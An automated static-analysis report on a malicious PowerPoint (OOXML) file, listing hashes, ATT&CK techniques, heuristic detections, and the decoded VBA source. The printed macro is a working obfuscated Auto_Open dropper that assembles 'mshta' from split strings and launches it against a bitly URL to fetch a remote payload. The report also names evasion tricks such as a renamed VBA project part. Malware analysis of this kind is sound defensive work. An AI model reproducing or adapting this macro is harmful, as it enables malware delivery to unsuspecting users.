Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d0674af594464452…

MALICIOUS

Office (OOXML)

10.5 KB First seen: 2021-06-17
MD5: 6f1f532e486e5d6683b56e41fb68d983 SHA-1: 129a7e45c9f83f5025c4f9c81a0e534832a4bb7c SHA-256: d0674af594464452612a8433c9147b146df87dc35a3a76ea284a94b11a0fef04
Risk Score: 172

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is an OOXML document containing obfuscated VBA macros. The Auto_Open macro executes a GetObject call to launch 'mshta' with a URL, which likely downloads and executes a second-stage payload. The URL 'https://www.bitly.com/asiajiwn' is identified as a potential IOC. The VBA code uses string concatenation and obfuscation techniques to hide the malicious intent.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/aw.bin)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    . _
    ShellExecute@ _
    NamakBora _
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    = _
    GetObject _
    (StrReverse _
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub _
    AutO_opEn _
    ()
  • VBA project is signed but not by a recognised publisher info VBA_SIGNED_UNTRUSTED
    The VBA project carries a digital signature, but the signer does not chain to a recognised code-signing publisher/CA (self-signed, unknown issuer, or unparseable). A signature alone is not evidence of benignity — malware is routinely self-signed or signed with stolen certificates.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/asiajiwn In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1268 bytes
SHA-256: 7f7f33e1e6c798664f690e90a7ee9e42cd1a39d1e2764345de8359ba35fa656d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub _
AutO_opEn _
()

Dim _
bora _
As _
New _
Class1

Dim _
NamakBora _
, _
lora _
As _
String
NamakBora _
= _
bora _
. _
getEnumName _
(1)
lora _
= _
bora _
. _
getEnumName _
(2)
lora2 _
= _
bora _
. _
getEnumName _
(2)


bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2

End _
Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum

    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
    
    End Enum
    
Public _
Function _
getEnumName _
(eValue As myenum)
Select _
Case _
eValue
    Case _
    1
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
    Case _
    2
        getEnumName _
        = _
        "https://www.bitly.com/asiajiwn"
    End _
    Select
End _
Function


Public _
Function _
myvalue _
()
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
End _
Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/aw.bin 19968 bytes
SHA-256: ab7114ce435d9d7adb476173dda619aa5b0268c84d82f73c0f6478689a70d84b
vbaProject_01.bin vba-project OOXML VBA project: ppt/vbaProjectSignature.bin 1928 bytes
SHA-256: c67e15911893e12a2e9d505781a95c9c0bdae898195ee9414d41193be7d10630